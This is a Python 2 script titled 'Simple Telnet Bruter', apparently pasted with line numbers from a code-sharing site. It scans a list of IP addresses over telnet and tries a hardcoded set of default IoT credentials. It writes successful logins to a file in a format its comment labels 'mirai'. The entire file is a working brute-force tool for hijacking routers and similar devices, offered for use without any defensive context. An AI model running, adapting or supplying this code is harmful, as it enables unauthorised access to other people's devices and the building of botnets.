#!/usr/bin/python# Simple Telnet Bruter | By; LiGhT# Lots of false possitive

1. #!/usr/bin/python
2. # Simple Telnet Bruter | By; LiGhT
3. # Lots of false possitives but pulls alot of results extremely fast
4.  
5. import threading
6. import sys, os, re, time, socket
7. from Queue import *
8. from sys import stdout
9.  
10. if len(sys.argv) < 4:
11. print "Usage: python "+sys.argv[0]+" <list> <threads> <output file>"
12. sys.exit()
13.  
14. combo = [
15. "support:support",
16. "root:vizxv",
17. "root:xc3511",
18. "telnet:telnet",
19. "root:root",
20. "supervisor:zyad1234",
21. "root: ",
22. "admin:1234",
23. "user:user",
24. "root:antslq",
25. "admin:admin",
26. "root:5up",
27. "mg3500:merlin",
28. "default:default",
29. "default:OxhlwSG8",
30. "admin:admin",
31. "root:annie2015"
32. ]
33.  
34. ips = open(sys.argv[1], "r").readlines()
35. threads = int(sys.argv[2])
36. output_file = sys.argv[3]
37. queue = Queue()
38. queue_count = 0
39.  
40. for ip in ips:
41. queue_count += 1
42. stdout.write("\r[%d] Added to queue" % queue_count)
43. stdout.flush()
44. queue.put(ip)
45. print "\n"
46.  
47.  
48. class router(threading.Thread):
49. def __init__ (self, ip):
50. threading.Thread.__init__(self)
51. self.ip = str(ip).rstrip('\n')
52. def run(self):
53. username = ""
54. password = ""
55. for passwd in combo:
56. if ":n/a" in passwd:
57. password=""
58. else:
59. password=passwd.split(":")[1]
60. if "n/a:" in passwd:
61. username=""
62. else:
63. username=passwd.split(":")[0]
64. try:
65. tn = socket.socket()
66. tn.settimeout(8)
67. tn.connect((self.ip,23))
68. except Exception:
69. tn.close()
70. break
71. try:
72. hoho = ''
73. hoho += readUntil(tn, "ogin:")
74. if "ogin" in hoho:
75. tn.send(username + "\n")
76. time.sleep(0.09)
77. except Exception:
78. tn.close()
79. try:
80. hoho = ''
81. hoho += readUntil(tn, "assword:")
82. if "assword" in hoho:
83. tn.send(password + "\n")
84. time.sleep(0.8)
85. else:
86. pass
87. except Exception:
88. tn.close()
89. try:
90. prompt = ''
91. prompt += tn.recv(40960)
92. if ">" in prompt and "ONT" not in prompt:
93. success = True
94. elif "#" in prompt or "$" in prompt or "%" in prompt or "@" in prompt:
95. success = True
96. else:
97. tn.close()
98. if success == True:
99. try:
100. os.system("echo "+self.ip+":23 "+username+":"+password+" >> "+output_file+"") # 1.1.1.1:23 user:pass # mirai
101. print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, self.ip)
102. tn.close()
103. break
104. except:
105. tn.close()
106. else:
107. tn.close()
108. except Exception:
109. tn.close()
110.  
111. def readUntil(tn, string, timeout=8):
112. buf = ''
113. start_time = time.time()
114. while time.time() - start_time < timeout:
115. buf += tn.recv(1024)
116. time.sleep(0.01)
117. if string in buf: return buf
118. raise Exception('TIMEOUT!')
119.  
120. def worker():
121. try:
122. while True:
123. try:
124. IP = queue.get()
125. thread = router(IP)
126. thread.start()
127. queue.task_done()
128. time.sleep(0.02)
129. except:
130. pass
131. except:
132. pass
133.  
134. for l in xrange(threads):
135. try:
136. t = threading.Thread(target=worker)
137. t.start()
138. except:
139. pass